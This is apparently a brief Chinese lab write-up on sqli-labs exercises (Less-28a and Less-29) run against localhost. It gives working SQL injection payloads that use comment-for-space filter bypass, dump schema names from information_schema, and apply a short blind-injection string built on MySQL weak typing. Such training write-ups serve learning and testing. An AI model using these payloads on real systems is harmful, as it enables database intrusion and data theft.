这道题发现页面中会显示出GET过去的参数
不过好像没有URL解码...
好奇怪 , 感觉好像是传过去之后又被编码了 , 还没有看源码 , 暂时不能确定
这样的话 , 说明执行的SQL语句就是URL编码以后的 , 这样肯定是不行的
用Burp抓包重放试试
后记 :
URL编码过滤了空格等等特殊字符 , 可以通过这样验证存在注入点
http://127.0.0.1/Less-29/?id=0'union/**/select/**/1,1,1/**/--+
http://127.0.0.1/Less-29/?id=0%27union/**/select/**/1,group_concat(schema_name),1/**/from/**/information_schema.schemata--+
这样就可以dump数据了
后记 :
还是可以利用前面的Payload通杀盲注
http://127.0.0.1/Less-28a/?id=0%27%20or()or%20%27%27=%271
后来发现这个Payload还可以简化
在mysql中也有弱类型机制 , '0' 和 '1' 可以分别表示假和真
简化后 :
?id=0'||()||'0